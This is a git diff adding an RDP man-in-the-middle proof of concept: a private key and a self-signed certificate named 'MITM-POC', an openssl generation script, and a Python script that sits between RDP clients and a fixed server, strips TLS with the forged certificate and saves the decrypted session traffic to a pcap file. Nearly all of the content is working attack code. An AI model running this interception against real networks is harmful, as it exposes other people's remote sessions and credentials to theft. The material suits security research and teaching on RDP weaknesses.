diff --git a/cert.key b/cert.key new file mode 100644 index 0000000..51fbfff --- /dev/null +++ b/cert.key @@ -0,0 +1,16 @@ +-----BEGIN PRIVATE KEY----- +MIICdQIBADANBgkqhkiG9w0BAQEFAASCAl8wggJbAgEAAoGBAMv0RTboOJRtedKK +hdI4bYPafVYrnpuNjlaD83ra5mf8reYmXs/EntMSz5YgbrZhWj2xqKrJ3FElZygV +XbD/C66pbcJtyqm7zkRbNrjuNkBRfLEjDCaUD66vWr5e/sC8eqHmHQoSw/JJly+x +yFsLqHwMoDYfe/SF7Q0gTLe2h2jHAgMBAAECgYAirXLDRjKwkfifoqvkNXHxdEnR +R/Nc0XG9JgxU/DkmvyC2PBnsy6qRiuY+yV7ppZ3ZVYavG0lZhrmGaDOY75SFnPoC +ypjOaGkLeVvTDNjWrHuDytHeHHnlbtdHTLqetlyoQ2k1NdOngGPUPgJKIXbvq4t/ +MH0vgAIwDR5vTOWaAQJBAPu136jiO+zhOPJOc4BjMVWD9iCBZjbnTvI7+xSXq78o +hjlbRpxYUp3lWKr6rE+X0jIxSwa5TzLLa+hY8hwVGccCQQDPbg1w5qjqZH1IcCdF +h853OR7Y930/rotrIeJUE5tpRHJ4Iq1E0pAdwNm34BTiCiii1QtOgtL4QM3fg46S +ozkBAkAYaWcrpeVR7/Xp6hnhlb0vIgE43dPf90b8zzxmnt8VRwTdgzCx8Q7yKVAU +JQOZJIxKOeWg3VAFCR2KBzZT6uf5AkBjbyYSUP/4HGPSLbElq4xVqpQW/cyUkl9S +49NS6nM9awpUfIsCys069g9oDYr1MFl6dRYOdLgdOTN3SeE2efgBAkBTbgblndDK +151g2ctz+6GUGNt8zv2VHtPna0dCFH8lSTLESHZ3UC3HgOLFIMG7qKTDCrPoYnLq +vPt+tivx2/Ao +-----END PRIVATE KEY----- diff --git a/cert.pem b/cert.pem new file mode 100644 index 0000000..1b81a32 --- /dev/null +++ b/cert.pem @@ -0,0 +1,16 @@ +-----BEGIN CERTIFICATE----- +MIICfjCCAeegAwIBAgIJAJLBLAkzV96EMA0GCSqGSIb3DQEBBQUAMFgxCzAJBgNV +BAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEwHwYDVQQKDBhJbnRlcm5ldCBX +aWRnaXRzIFB0eSBMdGQxETAPBgNVBAMMCE1JVE0tUE9DMB4XDTE0MDQyMDE4NTUz +MloXDTE1MDQyMDE4NTUzMlowWDELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUt +U3RhdGUxITAfBgNVBAoMGEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDERMA8GA1UE +AwwITUlUTS1QT0MwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMv0RTboOJRt +edKKhdI4bYPafVYrnpuNjlaD83ra5mf8reYmXs/EntMSz5YgbrZhWj2xqKrJ3FEl +ZygVXbD/C66pbcJtyqm7zkRbNrjuNkBRfLEjDCaUD66vWr5e/sC8eqHmHQoSw/JJ +ly+xyFsLqHwMoDYfe/SF7Q0gTLe2h2jHAgMBAAGjUDBOMB0GA1UdDgQWBBSb3fDY +rSIEImpAqbKWCZQA8ySnizAfBgNVHSMEGDAWgBSb3fDYrSIEImpAqbKWCZQA8ySn +izAMBgNVHRMEBTADAQH/MA0GCSqGSIb3DQEBBQUAA4GBADuewBJdn+SQqmNIflhS +qJg8Ugz4Xe8OresStFboz7qAXkHZOYlHqC79bI4OWHMnW+Dpi4PybypykIxxgQ/r +7MAAgBhzYOr2N4orEB8DcYR4GRgJhNfksQcCdlSzueXo4qcqgX+mgZTV3NFWjM9l +K4jEPaTigufYPTO3eMqzzRL2 +-----END CERTIFICATE----- diff --git a/gencert.sh b/gencert.sh new file mode 100755 index 0000000..ac9ba49 --- /dev/null +++ b/gencert.sh @@ -0,0 +1,2 @@ +#!/bin/bash +openssl req -new -x509 -days 365 -nodes -out cert.pem -keyout cert.key diff --git a/rdps2rdp_pcap.py b/rdps2rdp_pcap.py new file mode 100755 index 0000000..37bfc1d --- /dev/null +++ b/rdps2rdp_pcap.py @@ -0,0 +1,76 @@ +#!/usr/bin/env python +#DiabloHorn http://diablohorn.wordpress.com +#Inspired by: https://labs.portcullis.co.uk/blog/ssl-man-in-the-middle-attacks-on-rdp/ +#Resources: +# http://stackoverflow.com/questions/7574092/python-scapy-wrpcap-how-do-you-append-packets-to-a-pcap-file +# http://efod.se/media/thesis.pdf + +import logging +logging.getLogger("scapy.runtime").setLevel(logging.ERROR) + +import sys +from scapy.all import * +from socket import * +import ssl +import thread +import binascii + +BUFF = 1024 +OUTPUTPCAP = "output.pcap" +LISTENCON = ('0.0.0.0', 3389) +REMOTECON = ('10.50.0.125', 3389) + +def savepcap(src,dst,data): + pktdump = PcapWriter(OUTPUTPCAP, append=True, sync=True) + pktinfo = Ether()/IP(src=src[0],dst=dst[0])/TCP(sport=src[1],dport=dst[1])/data + pktdump.write(pktinfo) + pktdump.close() + +def handler(clientsock,addr): + serversock = socket(AF_INET, SOCK_STREAM) + serversock.connect(REMOTECON) + + #read client rdp data + serversock.sendall(clientsock.recv(19)) + #read server rdp data and check if ssl + temp = serversock.recv(19) + clientsock.sendall(temp) + if(temp[15] == '\x01'): + print('Intercepting rdp session from %s' % clientsock.getpeername()[0]) + sslserversock = ssl.wrap_socket(serversock,ssl_version=ssl.PROTOCOL_TLSv1) + sslserversock.do_handshake() #just in case + sslclientsock = ssl.wrap_socket(clientsock, server_side=True,certfile='cert.pem',keyfile='cert.key',ssl_version=ssl.PROTOCOL_TLSv1) + sslclientsock.do_handshake() #just in case + thread.start_new_thread(trafficloop,(sslclientsock,sslserversock,True)) + thread.start_new_thread(trafficloop,(sslserversock,sslclientsock,True)) + else: + print('Passing through %s' % clientsock.getpeername()[0]) + thread.start_new_thread(trafficloop,(clientsock,serversock,False)) + thread.start_new_thread(trafficloop,(serversock,clientsock,False)) + +def trafficloop(source,destination,dopcap): + string = ' ' + try: + while string: + string = source.recv(BUFF) + if string: + if dopcap: + savepcap(source.getpeername(),destination.getpeername(),string) + destination.sendall(string) + else: + source.shutdown(socket.SHUT_RD) + destination.shutdown(socket.SHUT_WR) + except: + print('some error happend') + pass #being highly lazy + +if __name__ == '__main__': + serversock = socket(AF_INET, SOCK_STREAM) + serversock.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) + serversock.bind(LISTENCON) + serversock.listen(5) + while 1: + print('waiting for connection...') + clientsock, addr = serversock.accept() + print('...connected from:', addr) + thread.start_new_thread(handler,(clientsock,addr))